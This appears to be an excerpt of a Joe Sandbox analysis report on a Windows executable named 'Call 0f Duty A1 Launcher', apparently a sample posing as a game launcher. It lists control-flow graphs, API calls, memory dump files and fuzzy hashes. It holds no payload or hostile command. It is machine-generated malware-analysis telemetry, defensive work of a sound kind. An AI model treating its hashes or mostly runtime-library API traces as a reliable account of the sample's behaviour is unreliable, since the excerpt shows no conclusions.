                                                                                                control_flow_graph 47 6bbeb0-6bbf22 CreateFileA 48 6bbf29-6bbf37 47->48 49 6bbf3d-6bbf4a 48->49 50 6bbff2-6bc00c 48->50 53 6bc021-6bc054 GetFileSize 49->53 54 6bbf50-6bbf5d 49->54 51 6bc16a 50->51 51->48 53->51 56 6bc078-6bc0ce call 6c4233 ReadFile 54->56 57 6bbf63-6bbf70 54->57 56->51 60 6bc011-6bc01c 57->60 61 6bbf76-6bbf83 57->61 60->51 64 6bbf89-6bbf96 61->64 65 6bc12c-6bc146 CloseHandle 61->65 67 6bbf9c-6bbfa9 64->67 68 6bc0f6-6bc108 call 6c423c 64->68 65->51 71 6bbfaf-6bbfbc 67->71 72 6bc0d3-6bc0f1 67->72 68->51 75 6bc059-6bc073 CloseHandle 71->75 76 6bbfc2-6bbfcf 71->76 72->51 75->51 78 6bc14b-6bc169 call 6c4241 76->78 79 6bbfd5-6bbfe2 76->79 82 6bbfe8-6bbfed 79->82 83 6bc10d-6bc127 CloseHandle 79->83 82->51 83->51
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 7116c434f49fe49f352e854c9e9f2f798cc9753bec4dca27d4bffcb62dea206c
                                                                                                • Instruction ID: 104ac9da2cb962fdd72dbfa16baadb7546189cb9c51a10395ee276fe2e7b2815
                                                                                                • Opcode Fuzzy Hash: 7116c434f49fe49f352e854c9e9f2f798cc9753bec4dca27d4bffcb62dea206c
                                                                                                • Instruction Fuzzy Hash: C67158B4E05209CFCB04DFACD5586EEBBF2EB48710F10851EE846AB350DB759A858F52

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CreateThread.KERNELBASE(?,?,Function_00016E00,00000000,?,?), ref: 006C6D2F
                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,006C3BEA), ref: 006C6D3B
                                                                                                • __dosmaperr.LIBCMT ref: 006C6D42
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastThread__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2744730728-0
                                                                                                • Opcode ID: 92088c4e93c2e8b278f1a0675a5708d42eb0986de5791ecee1a593c90cbe1137
                                                                                                • Instruction ID: 44af937df5a2a0d5bde24adb01a09c54e30f6be1df225b68423478b1e01bd5be
                                                                                                • Opcode Fuzzy Hash: 92088c4e93c2e8b278f1a0675a5708d42eb0986de5791ecee1a593c90cbe1137
                                                                                                • Instruction Fuzzy Hash: 8D014072600259ABDF159FA0DC06FFE3BA6EF40754F10405DB80296250DB70EE50DBA8

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000002,?,006C70B1,006C83A0,006C83A0,?,00000002,C362B542,006C83A0,00000002), ref: 006C7000
                                                                                                • TerminateProcess.KERNEL32(00000000,?,006C70B1,006C83A0,006C83A0,?,00000002,C362B542,006C83A0,00000002), ref: 006C7007
                                                                                                • ExitProcess.KERNEL32 ref: 006C7019
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: bd86384de9e79b333086c96f7e5bfed2b0715ddc0dfd2b2ffa2b51e91e8f72ab
                                                                                                • Instruction ID: 282539524313a17fa79c3bae04e59ea477809a9e41cfb38606eaf263320bd6dd
                                                                                                • Opcode Fuzzy Hash: bd86384de9e79b333086c96f7e5bfed2b0715ddc0dfd2b2ffa2b51e91e8f72ab
                                                                                                • Instruction Fuzzy Hash: 17D06C31405108ABCF513F60ED0AEAD3F6BEF44351B049019B9198A162CB35999ADBA8

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 113 6c41c6-6c41c9 114 6c41d8-6c41db call 6c83c7 113->114 116 6c41e0-6c41e3 114->116 117 6c41cb-6c41d6 call 6c7207 116->117 118 6c41e5-6c41e6 116->118 117->114 121 6c41e7-6c41eb 117->121 122 6c41f1-6c49c1 call 6c482e call 6c59fc 121->122 123 6c49c2-6c49f2 call 6c1040 call 6c59fc IsProcessorFeaturePresent 121->123 122->123 134 6c49f9-6c4ad8 call 6c4ad9 123->134 135 6c49f4-6c49f7 123->135 135->134
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006C49EA
                                                                                                • ___raise_securityfailure.LIBCMT ref: 006C4AD2
                                                                                                  • Part of subcall function 006C59FC: RaiseException.KERNEL32(E06D7363,00000001,00000003,006C49DE,C362B542,?,?,?,006C49DE,?,006D9B2C), ref: 006C5A5C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                                                                • String ID:
                                                                                                • API String ID: 3749517692-0
                                                                                                • Opcode ID: 4dbb1c63038311cfb942950021a393e350eca5966260fabf256ec682a7b3328e
                                                                                                • Instruction ID: b6cea0c2de0ad645c5c536686ec442341f4e40765b01dc22d692cc90ea5e6107
                                                                                                • Opcode Fuzzy Hash: 4dbb1c63038311cfb942950021a393e350eca5966260fabf256ec682a7b3328e
                                                                                                • Instruction Fuzzy Hash: E0316DB4D0220A9ED700DF55FD56B697BABFB08320F10626FE908C63A1EB70A595CB44

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 138 6ca732-6ca737 139 6ca739-6ca751 138->139 140 6ca75f-6ca768 139->140 141 6ca753-6ca757 139->141 143 6ca77a 140->143 144 6ca76a-6ca76d 140->144 141->140 142 6ca759-6ca75d 141->142 145 6ca7d4-6ca7d8 142->145 148 6ca77c-6ca789 GetStdHandle 143->148 146 6ca76f-6ca774 144->146 147 6ca776-6ca778 144->147 145->139 149 6ca7de-6ca7e1 145->149 146->148 147->148 150 6ca78b-6ca78d 148->150 151 6ca7b6-6ca7c8 148->151 150->151 152 6ca78f-6ca798 GetFileType 150->152 151->145 153 6ca7ca-6ca7cd 151->153 152->151 154 6ca79a-6ca7a3 152->154 153->145 155 6ca7ab-6ca7ae 154->155 156 6ca7a5-6ca7a9 154->156 155->145 157 6ca7b0-6ca7b4 155->157 156->145 157->145
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,006CA621,006DA088,0000000C), ref: 006CA77E
                                                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,006CA621,006DA088,0000000C), ref: 006CA790
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileHandleType
                                                                                                • String ID:
                                                                                                • API String ID: 3000768030-0
                                                                                                • Opcode ID: 4dd522cf7edbdd62161c9bfd76998f6736938f38ba3f857d6444eadfbe222071
                                                                                                • Instruction ID: 9fbf652cfc04b87268d0df83d2ffa13e62cb8ef7464e9580bdb616bf71083e3c
                                                                                                • Opcode Fuzzy Hash: 4dd522cf7edbdd62161c9bfd76998f6736938f38ba3f857d6444eadfbe222071
                                                                                                • Instruction Fuzzy Hash: 4211A8799047494ACB304E7D8C88F727AA7FB56338734071ED5B6C66F1C234D846D662

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(006D9D20,0000000C), ref: 006C6E13
                                                                                                • ExitThread.KERNEL32 ref: 006C6E1A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastThread
                                                                                                • String ID:
                                                                                                • API String ID: 1611280651-0
                                                                                                • Opcode ID: f4a34ebd7890626d96ad342440db4df5bb2969e504c5b13e0b5fd34158bf5b66
                                                                                                • Instruction ID: 67d667e634994a15beb7e51cd13f19ad1560fa5cc4df1b891800ba197d9f8dd2
                                                                                                • Opcode Fuzzy Hash: f4a34ebd7890626d96ad342440db4df5bb2969e504c5b13e0b5fd34158bf5b66
                                                                                                • Instruction Fuzzy Hash: 0EF04975A00605AFDB51AFB0C84AF7E3BA7FF05710F10454EF0069B2A2DB75A901CBA5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 178 6cb0cb-6cb0d4 179 6cb0d6-6cb0e9 RtlFreeHeap 178->179 180 6cb103-6cb104 178->180 179->180 181 6cb0eb-6cb102 GetLastError call 6cb7a0 call 6cb757 179->181 181->180
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,006CBC39,?,00000000,?,?,006CBB55,?,00000007,?,?,006CC16E,?,?), ref: 006CB0E1
                                                                                                • GetLastError.KERNEL32(?,?,006CBC39,?,00000000,?,?,006CBB55,?,00000007,?,?,006CC16E,?,?), ref: 006CB0EC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 485612231-0
                                                                                                • Opcode ID: 4869a82c1d66dbc52179978e7adebfc1c4bdafb6e2e4d279a63c5f99eab6a54b
                                                                                                • Instruction ID: f6be23da00ae5c7cb5adfc645df899210f6657cf736bdbc2a31e80b26b4f7fe4
                                                                                                • Opcode Fuzzy Hash: 4869a82c1d66dbc52179978e7adebfc1c4bdafb6e2e4d279a63c5f99eab6a54b
                                                                                                • Instruction Fuzzy Hash: 98E0CD3190134867CB112FA0FC0EFA93B9FDF84351F042029F50CC6561C7348950CBA8

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 263 6c3b60-6c3be5 call 6be940 call 6c3cc0 call 6c3dc0 call 6c6ce6 271 6c3bea-6c3bf7 263->271 272 6c3bfe-6c3c0c 271->272 273 6c3c55-6c3c6b 272->273 274 6c3c12-6c3c1f 272->274 275 6c3cb5 273->275 277 6c3c84-6c3c95 call 6c441d 274->277 278 6c3c25-6c3c32 274->278 275->272 281 6c3c9a-6c3cb2 call 6c3e30 call 6c4241 277->281 278->281 282 6c3c38-6c3c45 278->282 286 6c3c4b-6c3c50 282->286 287 6c3c70-6c3c7f call 6c3de0 282->287 286->275 287->275
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ae443b98c721a18d5eb25ec4ecf33a915da4ed421bc63d1bbe55bd49bd8c85d8
                                                                                                • Instruction ID: b2e176862f686d43e2fb22128a5ecd37d9707cb1557efa0a8294781f296a6d47
                                                                                                • Opcode Fuzzy Hash: ae443b98c721a18d5eb25ec4ecf33a915da4ed421bc63d1bbe55bd49bd8c85d8
                                                                                                • Instruction Fuzzy Hash: 9231C1B4D042198BCB44DFA9C594ABEBBF2EF48304F10C42EE456AB340DB35AA05CF59

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 293 6c9e9e-6c9ec8 294 6c9ece-6c9ed0 293->294 295 6c9eca-6c9ecc 293->295 297 6c9ed6-6c9edd call 6c9dd3 294->297 298 6c9ed2-6c9ed4 294->298 296 6c9f1f-6c9f22 295->296 300 6c9ee2-6c9ee6 297->300 298->296 301 6c9ee8-6c9ef6 GetProcAddress 300->301 302 6c9f05-6c9f1c 300->302 301->302 304 6c9ef8-6c9f03 call 6c6ad0 301->304 303 6c9f1e 302->303 303->296 304->303
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ca196c148b9255e5cfe8b1bd37dbf23176040af2537a4b72527d6257e2edcfce
                                                                                                • Instruction ID: 385ae42df7d1632c15d3dce1f6ca924812b56a0d5c96d86c443200935ea2ca73
                                                                                                • Opcode Fuzzy Hash: ca196c148b9255e5cfe8b1bd37dbf23176040af2537a4b72527d6257e2edcfce
                                                                                                • Instruction Fuzzy Hash: B301F533A042199B9B028F69EC48F7677ABFBC9320729512DF914DB258EB30D80187E4

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateElliptic
                                                                                                • String ID:
                                                                                                • API String ID: 1611293138-0
                                                                                                • Opcode ID: 53f0e19b2ec47364e44072ba7575c6136fe2a080980a9099d6a02e12987c456b
                                                                                                • Instruction ID: 01f0451aa4f386974f87aa26d83332d7742ae558d2cbe47e3a1c2d9a9ed1fe26
                                                                                                • Opcode Fuzzy Hash: 53f0e19b2ec47364e44072ba7575c6136fe2a080980a9099d6a02e12987c456b
                                                                                                • Instruction Fuzzy Hash: B211D6B4D002099BCB04EFA8C4557EEBBF1EF48314F40892ED855A7354EB74A644CB95

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 316 6cbc45-6cbc51 317 6cbc83-6cbc8e call 6cb757 316->317 318 6cbc53-6cbc55 316->318 325 6cbc90-6cbc92 317->325 319 6cbc6e-6cbc7f RtlAllocateHeap 318->319 320 6cbc57-6cbc58 318->320 322 6cbc5a-6cbc61 call 6c8327 319->322 323 6cbc81 319->323 320->319 322->317 328 6cbc63-6cbc6c call 6c7207 322->328 323->325 328->317 328->319
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,006C41E0,?,?,006C1007,?,006BFAB5), ref: 006CBC77
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 3084beb045ee4759d87a91a41d54fdac8c1a5895df7658e1311b0c9a06a3dd7e
                                                                                                • Instruction ID: 9a82c538c8547750bfcd2abec019de850fee619d09995ee3a24aa37726bb982a
                                                                                                • Opcode Fuzzy Hash: 3084beb045ee4759d87a91a41d54fdac8c1a5895df7658e1311b0c9a06a3dd7e
                                                                                                • Instruction Fuzzy Hash: B3E0A9319016666AEB2126619C07FFB3A4BEB813A0F04312EBC2496290CF21C801C2A8
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006C4CB6
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 006C4CC4
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 006C4CD5
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 006C4CE6
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 006C4CF7
                                                                                                • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 006C4D08
                                                                                                • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 006C4D19
                                                                                                • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 006C4D2A
                                                                                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 006C4D3B
                                                                                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 006C4D4C
                                                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 006C4D5D
                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 006C4D6E
                                                                                                • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 006C4D7F
                                                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 006C4D90
                                                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 006C4DA1
                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 006C4DB2
                                                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 006C4DC3
                                                                                                • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 006C4DD4
                                                                                                • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 006C4DE5
                                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 006C4DF6
                                                                                                • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 006C4E07
                                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 006C4E18
                                                                                                • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 006C4E29
                                                                                                • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 006C4E3A
                                                                                                • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 006C4E4B
                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 006C4E5C
                                                                                                • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006C4E6D
                                                                                                • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 006C4E7E
                                                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006C4E8F
                                                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006C4EA0
                                                                                                • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 006C4EB1
                                                                                                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 006C4EC2
                                                                                                • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 006C4ED3
                                                                                                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 006C4EE4
                                                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 006C4EF5
                                                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 006C4F06
                                                                                                • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 006C4F17
                                                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 006C4F28
                                                                                                • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 006C4F39
                                                                                                • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 006C4F4A
                                                                                                • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 006C4F5B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
